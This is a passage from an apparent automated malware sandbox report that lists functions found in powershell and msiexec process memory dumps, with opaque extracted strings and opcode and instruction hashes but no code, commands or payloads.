String ID: (f?l$(f?l$(f?l$(f?l
API String ID: 0-1512639315
Opcode ID: 14fe945d4d1da96389d07c2f567fb5eb2dfb227f737a5fa844cfd233e2b39f09
Instruction ID: 6b706038697f60920d64021d4c9c2c45be8a6a71f52224472b18369085a74a40
Opcode Fuzzy Hash: 14fe945d4d1da96389d07c2f567fb5eb2dfb227f737a5fa844cfd233e2b39f09
Instruction Fuzzy Hash: F87181B4A00206DFDB14CFB8C555AAEBBB6EF89314F548469D8126B315CB35EC42CF91

Function 07669F74 Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

xS?l, xrefs: 07669FE6
4']q, xrefs: 0766A0C5
,S?l, xrefs: 0766A0A4
d5/k, xrefs: 0766A096

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: ,S?l$4']q$d5/k$xS?l
API String ID: 0-3648036307
Opcode ID: ac7221c5916f203eb89cab1f56dce20026e90865a0abb5efe04e8c0f32412e75
Instruction ID: 8a6b072f7e8fbfc8ebeff7f2df93ebbd645ea90b8eede3c0bb6fea1fb7b17d56
Opcode Fuzzy Hash: ac7221c5916f203eb89cab1f56dce20026e90865a0abb5efe04e8c0f32412e75
Instruction Fuzzy Hash: 8F4150F17043028FCB159F748545666FBA1DF86314B89C06AD906AF312D735DC85C7E1

Function 07664D7D Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

$]q, xrefs: 07664E82
$]q, xrefs: 07664E76
$]q, xrefs: 07664D62
Vai, xrefs: 07664E4C

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$Vai
API String ID: 0-80544341
Opcode ID: 8e459e2c64b523b549c4e6ea6c981f8d1bbb3d107ed260aa6ebaaf33e4c96dbd
Instruction ID: f34094a2d370d33164ecb422695ae16a56eb2535e3ddee9a41c78679ec2e627e
Opcode Fuzzy Hash: 8e459e2c64b523b549c4e6ea6c981f8d1bbb3d107ed260aa6ebaaf33e4c96dbd
Instruction Fuzzy Hash: FD31D2B13083855FC725862C9C14B967FA6DFC2310F948427EA028F3A6CE359D41C3A1

Function 076636A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 076636B2
$]q, xrefs: 076636CE
$]q, xrefs: 07663708
$]q, xrefs: 076636FC

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: fa3b62707b05749a7addb01966894b12391fb81b94838130b1e142575816c220
Instruction ID: 3605b79e3ce70f02e563787d5bd37b98488ab62df94405d34274d4627db50382
Opcode Fuzzy Hash: fa3b62707b05749a7addb01966894b12391fb81b94838130b1e142575816c220
Instruction Fuzzy Hash: 012179F13102466BDB28553F8858B27BFDA9BC2711FA4882A9907C7381CE36C8428335

Function 0766AFAC Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

$]q, xrefs: 0766B07F
$]q, xrefs: 0766B03B
$]q, xrefs: 0766B01F
$]q, xrefs: 0766B063

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: cf4db6dde83a578902cff7eeee928a385f8e693e0a6b357bc7358513ff7cac4c
Instruction ID: 72833eade8294a8d399936ceea438e5dc20dca22ce3e1d72e42f2f90a1ea50ec
Opcode Fuzzy Hash: cf4db6dde83a578902cff7eeee928a385f8e693e0a6b357bc7358513ff7cac4c
Instruction Fuzzy Hash: BE2102F2A04306DEDB25AE648548AB6BFF1BF41210FB4446AD81EC7302D7359595CB91

Function 07660308 Relevance: 5.1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766037F
$]q, xrefs: 07660352
$]q, xrefs: 0766035E
4']q, xrefs: 07660373

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 762df3710c111e3daec067b7891444bbc29d9d924c901e58e81d89cdf6cec9d1
Instruction ID: 9311115739a1435d7bd4912b7c1ea354e4aefcd168dcdd34a29cb12a24b11c7f
Opcode Fuzzy Hash: 762df3710c111e3daec067b7891444bbc29d9d924c901e58e81d89cdf6cec9d1
Instruction Fuzzy Hash: C701D47130D7925FC32B123859254A56FF69F8392176A48E7C481EF2A3CE194C4983A7

Analysis Process: msiexec.exePID: 6220, Parent PID: 428COMMON

Executed Functions

Function 00C3C148 Relevance: 2.7, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3C400
PH]q, xrefs: 00C3C3EF

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 88361d25b89676b714b05da19e107de834ed1d7effde8841013609ad12537321
Instruction ID: 712f396821c853bd8f0000ace1939e0300d8199bfea2ec75d45c8d64f8cd8504
Opcode Fuzzy Hash: 88361d25b89676b714b05da19e107de834ed1d7effde8841013609ad12537321
Instruction Fuzzy Hash: 6EA1C375E10218DFDB18DFAAD894A9DBBF2BF89300F14C069E419AB365DB349941CF50

Function 00C35362 Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C355D9
PH]q, xrefs: 00C355C8

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: c783d6e4926d169feb3937fe7678b19ebfdb1180d798839ff30f4fe494a7c83a
Instruction ID: dc1356cd26a906d2443f1f81cb9f89c45a79aab586badd59cccb0200126c6cb6
Opcode Fuzzy Hash: c783d6e4926d169feb3937fe7678b19ebfdb1180d798839ff30f4fe494a7c83a
Instruction Fuzzy Hash: B291C374E10658CFDB18DFA9D884A9DBBF2BF89300F14C069E419AB265DB349985CF50

Function 00C3CA08 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3CC70
PH]q, xrefs: 00C3CC5F

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 93fdafce5faa958e5acca21ba20604246b387ced065d5d80f781283007415b76
Instruction ID: 159b0c16a124ea69ade49b24286516bd9e00781cc6970245a065bde1f624ed0b
Opcode Fuzzy Hash: 93fdafce5faa958e5acca21ba20604246b387ced065d5d80f781283007415b76
Instruction Fuzzy Hash: 3C81B374E10258CFDB18DFAAD894A9DBBF2BF89300F14D069E419AB365DB349981CF50

Function 00C3C468 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3C6D0
PH]q, xrefs: 00C3C6BF

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 9f03382f4a71da613a92b560d21f167553d47305af5dd4790e4e3303453ec4dd
Instruction ID: dd462f813f88222261d45cc1bc99f76a81c43c5e28a7b576d3e2a9371fc6fc48
Opcode Fuzzy Hash: 9f03382f4a71da613a92b560d21f167553d47305af5dd4790e4e3303453ec4dd
Instruction Fuzzy Hash: 2681A274E10218CFDB18DFAAD984A9DBBF2BF89300F24D069E419AB365DB349945CF50

Function 00C3D278 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3D4E0
PH]q, xrefs: 00C3D4CF

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 7a164b342507d3bf3360bff5c155ab9f15072a93eeeeb4fb0911644f766c5d56
Instruction ID: f5f7e64f02987feffacd69adb3a4d6206c1e8c482ef68b436cded92807ce0c6c
Opcode Fuzzy Hash: 7a164b342507d3bf3360bff5c155ab9f15072a93eeeeb4fb0911644f766c5d56
Instruction Fuzzy Hash: 9081A374E10218CFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB349945CF51

Function 00C3C738 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3C9A0
PH]q, xrefs: 00C3C98F

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: d84547215fd476b140cf05c6410246116ea35487fd6134540628ceb0bbe63dad
Instruction ID: 3016ce9f4d94837a7ce47f62e2803eb4d7da4e7a7057eae7662d62ee7e0b2de6
Opcode Fuzzy Hash: d84547215fd476b140cf05c6410246116ea35487fd6134540628ceb0bbe63dad
Instruction Fuzzy Hash: 7D818074E102189FDB18DFAAD984B9DBBF2BF89300F14C069E419AB365DB349981CF51

Function 00C3CCD8 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3CF2F
PH]q, xrefs: 00C3CF40

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: e98cf5a5bfa599db993dbd557f5eb3d477397a69d49dc54a50a30413d6d9a3a3
Instruction ID: 8faa9987d7010a18da2bbbad10a52456790fea244afc35eafdcc39f6dee5946e
Opcode Fuzzy Hash: e98cf5a5bfa599db993dbd557f5eb3d477397a69d49dc54a50a30413d6d9a3a3
Instruction Fuzzy Hash: 17819274E10218CFDB18DFAAD994A9DBBF2BF89300F14C069E419AB365DB349985CF50

Function 00C3CFA9 Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH]q, xrefs: 00C3D210
PH]q, xrefs: 00C3D1FF

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 017e0dada2b9aa03870e451b65e639e4439c2dae7f49a21a92ebc174b85ae3c3
Instruction ID: b55a7f92e1b5a559d6b997960e089dff9c28a18b5982c75e1fae04e1cfa1e34b
Opcode Fuzzy Hash: 017e0dada2b9aa03870e451b65e639e4439c2dae7f49a21a92ebc174b85ae3c3
Instruction Fuzzy Hash: DE81A274E10258CFDB18DFAAD984A9DBBF2BF89310F14C069E419AB365DB349981CF50

Function 2692D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2bbe120ff6696e723aac9cc168562d6034372dce4f073f4e0b63b02c106a769
Instruction ID: e2698431e6b6a220156163ba9219b86d1db1dc48e6a2fd470b240ed89b203784
Opcode Fuzzy Hash: a2bbe120ff6696e723aac9cc168562d6034372dce4f073f4e0b63b02c106a769
Instruction Fuzzy Hash: FBC1A074E01218CFDB54DFA5C954B9DBBB2EF89304F2080AAE409AB355DB359E85CF50

Function 26922968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212fe6c2ab3f32be01511f8b9ee014b2a413f7567aaf0d45da619c1d19a86b88
Instruction ID: 7cf67af61287d5275c32cac3fb5a95ef05b333c41c2f691ee3a428471ed8f54c
Opcode Fuzzy Hash: 212fe6c2ab3f32be01511f8b9ee014b2a413f7567aaf0d45da619c1d19a86b88
Instruction Fuzzy Hash: 30C18E74E01218CFDB54DFA5C994B9DBBB2FF89304F2080A9E809AB355DB359A85CF50

Function 26921E80 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fe464528b349e0dc517b42ed7b93f3e43580c5a7f79ee7d4dbb5b812aab2d3
Instruction ID: dbadfa399048e3146ccba6beeab4e364075852ffbdb88621003249975ab205ae
Opcode Fuzzy Hash: 81fe464528b349e0dc517b42ed7b93f3e43580c5a7f79ee7d4dbb5b812aab2d3
Instruction Fuzzy Hash: 29A1A274E016288FEB68CF6AC994BDDFBF2AF88300F14C0A9D508A7254DB345A85CF51

Function 26922DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e598bde69cc2a1ec0c4292fccec385c5c966135d33c908b85070a067aeddce
Instruction ID: 5eecaf8758cce12e818226b91556d0926b5342e007e860b616d2ed95ed419d4b
Opcode Fuzzy Hash: 63e598bde69cc2a1ec0c4292fccec385c5c966135d33c908b85070a067aeddce
Instruction Fuzzy Hash: A2A11670D00608CFDB14DFA9C984BDDBBB1FF88314F208269E509AB2A6DB759985CF51

Function 269217A0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8489289b0fbdea65bf7b469c120b66fddff623dd4069f2914ac891ee7ac2c567
Instruction ID: 583231f29a6f1101b51de0dd5a9e7ae94269fbc8eafbc43cdeb44c91524426bb
Opcode Fuzzy Hash: 8489289b0fbdea65bf7b469c120b66fddff623dd4069f2914ac891ee7ac2c567
Instruction Fuzzy Hash: DAA192B5E016298FEB64CF6AC944BDEFBF2AF88300F14C1A9D508A7254DB345A85CF51

Function 26922DC3 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a3354592b62a973d87cf0b4f4394aff23b708590d0148c107ac85047d5ae24
Instruction ID: c9931a7e713facca0221fd7cf5d00d45e24b2f8a3cc5be0b1c0d32a6e1882909
Opcode Fuzzy Hash: f5a3354592b62a973d87cf0b4f4394aff23b708590d0148c107ac85047d5ae24
Instruction Fuzzy Hash: 0CA10570D00608CFDB14DFA9C984BDDBBB1FF88314F208269E509AB2A6DB759985CF50

Function 26922DB8 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88361a1d0d35717d15963cd97d7bd75e17493ff091addb40cab61ad6dad6a374
Instruction ID: aed41a6ab3b2dd9c65f886abd217372368060b1305c8a7ea4641cc53179900b6
Opcode Fuzzy Hash: 88361a1d0d35717d15963cd97d7bd75e17493ff091addb40cab61ad6dad6a374
Instruction Fuzzy Hash: 2B910470D00608CFDB14DFA9C984BDDBBB1FF88314F209269E509AB2A6DB749985CF54

Function 2692310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386cc59c4c9f0198af2be4d41a0e8c48b53d0ba32745cd0e63013ee1f1742186
Instruction ID: f79b11c8667128fac5bbcd6357d675043bbeb44895a01845771107fbc5ec24ba
Opcode Fuzzy Hash: 386cc59c4c9f0198af2be4d41a0e8c48b53d0ba32745cd0e63013ee1f1742186
Instruction Fuzzy Hash: 98910470E00608CFEB10DFA8C994BDDBBB1FF49310F209299E509AB296DB759985CF50

Function 2692FC68 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54f1b4c0952457c69f8faa415e153e27be49377e6f319b1244c97035f345fbae
Instruction ID: deaaf8d322efa4379c083bcdb3b2540face785d3892fd66a1274458611e70c28
Opcode Fuzzy Hash: 54f1b4c0952457c69f8faa415e153e27be49377e6f319b1244c97035f345fbae
Instruction Fuzzy Hash: 6581A074E00218CFDB14DFA9D990B9DBBB6FF88300F208129E814BB259DB799946DF50

Function 2692178F Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1caae8c501efc064c90b113d88a62d9fe9df40dbc09122b0beb47abc37c1c52
Instruction ID: 33fe6d7f95e30dec69321616a9193a1f7ca52e356dcaea8bc3dc5539fd570815
Opcode Fuzzy Hash: d1caae8c501efc064c90b113d88a62d9fe9df40dbc09122b0beb47abc37c1c52
Instruction Fuzzy Hash: D881A7B5D016188FEB68CF6AC954B9EBBF2BF88300F14C1E9D508A7254EB744A85CF51

Function 00C3F71F Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144ad7d4a91d9f5755656d8da9dad96116b369917706a586ca82abc96fa7aea0
Instruction ID: 0b99adf71cb2e687d6d10b88809f0a15e0affcee87e399a2e3b39eb2be62a8c0
Opcode Fuzzy Hash: 144ad7d4a91d9f5755656d8da9dad96116b369917706a586ca82abc96fa7aea0
Instruction Fuzzy Hash: 5B511274E01318DFDB14CFA5D994BAEBBB2FF88304F208529D809AB255EB395946CF41

Function 00C3E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d0a32ac55304b28e8e78f57e6aa0e7f6430b8cc93954abe8670086d749e783
Instruction ID: 749f01c54ca382f533996f880e75aa1006e1cd0749beb43dd254113986808069
Opcode Fuzzy Hash: d7d0a32ac55304b28e8e78f57e6aa0e7f6430b8cc93954abe8670086d749e783
Instruction Fuzzy Hash: 5251B474E00208DFDB18DFAAD594A9DBBB6FF88300F208029E815AB3A5DB345945CF14

Function 00C3E97B Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143a0c353e9428281ec1b4b460720ee973fad5129f30edfc277edc603f3f47ea
Instruction ID: 62f70043e234670a239738d389c951d4cc7719b58bf6e897961c29005c561be3
Opcode Fuzzy Hash: 143a0c353e9428281ec1b4b460720ee973fad5129f30edfc277edc603f3f47ea
Instruction Fuzzy Hash: 0451C774E00208DFDB18DFAAD994A9DBBB2FF88300F24C029E815AB3A5DB345945CF54

Function 26921E70 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42da6bd86305864e8ce752f8ac2b1420507da305230d04df9a6c0bff191198cc
Instruction ID: 864d0cd38f57abe76f404a12dc81a23d39430ffee2f9e5a3ba5e95635bd785a8
Opcode Fuzzy Hash: 42da6bd86305864e8ce752f8ac2b1420507da305230d04df9a6c0bff191198cc
Instruction Fuzzy Hash: 334158B1E016188BEB58CF5BC9547DEFAF3AFC8304F14C1AAD50CA6264EB750A858F51

Function 2692D999 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e098d061c6c95d49d734fcc31ffb4195d84cfd9ad02651dcc7e32d377e2585af
Instruction ID: 5ba1fe6efd8127e627223571048f1c34eea7064c8abb2b9cf89c91c55e6cf3c3
Opcode Fuzzy Hash: e098d061c6c95d49d734fcc31ffb4195d84cfd9ad02651dcc7e32d377e2585af
Instruction Fuzzy Hash: 29411570E05648CFDB09CFBAC8546DDBBB2AF89304F24C16AD418BB299DB35594ACF41

Function 2692295B Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315d3aff2dd8e0fb489393eced720083c0c335a7f1060bfa86463afde6c5c68d
Instruction ID: 2055a08eb259586043679c8e6f7e39839601cccf5df2918b1423aade6595ddcf
Opcode Fuzzy Hash: 315d3aff2dd8e0fb489393eced720083c0c335a7f1060bfa86463afde6c5c68d
Instruction Fuzzy Hash: 7F31D2B5E01A08CBDB18CFA6C99469DFBB2BF89300F24D12AD419AB259DB355946CF40

Function 26923FE8 Relevance: 6.7, Strings: 5, Instructions: 409COMMON

Download Yara Rule

Strings

Haq, xrefs: 26924231
8bq, xrefs: 26924429
Haq, xrefs: 26924036
Haq, xrefs: 269241D2
TJbq, xrefs: 26924462

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID: 8bq$Haq$Haq$Haq$TJbq
API String ID: 0-1597716666
Opcode ID: 2cf3d4bb4f0acffbce59b272db4c1f81ebd5eac2dcab8cb236e9cccf14b0fc20
Instruction ID: c70dd18455f3cde705a3305c018f7871d4a4601ffc0eab0fbd968b37b2b55637
Opcode Fuzzy Hash: 2cf3d4bb4f0acffbce59b272db4c1f81ebd5eac2dcab8cb236e9cccf14b0fc20
Instruction Fuzzy Hash: B6E10634B046048FC705DF68C590AAD7BF6EF8A720F2445A6E506DB3AACE34DD46CB91

Function 26923A60 Relevance: 5.3, Strings: 4, Instructions: 315COMMON

Download Yara Rule

Strings

Haq, xrefs: 26923CEE
Haq, xrefs: 26923D21
, xrefs: 26923B4D
Haq, xrefs: 26923CBB

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 057a980f266ffe2da8bcf1b1fbdfe349ce206231b5b4b054293151ce488c7a46
Instruction ID: c6fbce8f189fed0eea34c7dc6137098ff2b525037ba5998f09cf9f07dc34bbe6
Opcode Fuzzy Hash: 057a980f266ffe2da8bcf1b1fbdfe349ce206231b5b4b054293151ce488c7a46
Instruction Fuzzy Hash: 3FB1F430B106148FDB159F789458A6E3BA6EFC5720F20466AF916C73D5DE38DD01CB91

Function 26923A50 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

Haq, xrefs: 26923CEE
, xrefs: 26923AFD
Haq, xrefs: 26923D21
Haq, xrefs: 26923CBB

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 4914186c522e306107bfd79a14ab294f7ada7842a12028c95606ff8b2e405873
Instruction ID: 90d4958d2486eb9d3fc2170252654955ba2a0de72c364ffaf7f5c710ac8d66eb
Opcode Fuzzy Hash: 4914186c522e306107bfd79a14ab294f7ada7842a12028c95606ff8b2e405873
Instruction Fuzzy Hash: FA810430B106148FCB059F78C498A6E3BA6EFC6710F2145AAE906CB3D5DE38DD01CB91

Function 00C36498 Relevance: 2.7, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

,aq, xrefs: 00C3656E
,aq, xrefs: 00C36578

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 38c84a15d8c46ff78f9069d9bd4b522607fc78faa201205b086b2683739ecda2
Instruction ID: 801512b1e98935011b1825a2442815f045af6e90ee564468ed5f9a555f15d3e2
Opcode Fuzzy Hash: 38c84a15d8c46ff78f9069d9bd4b522607fc78faa201205b086b2683739ecda2
Instruction Fuzzy Hash: E6819C30A20505EFCB18DF69C485AAABBB2BF89354F24C169E416E7365DB31EC41CB90

Function 00C35F5C Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

Haq, xrefs: 00C36056
Haq, xrefs: 00C36023

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: d33294436e8a5ce86f272889875bd0822cbd2773fae720cfe8deae6d4f51fefc
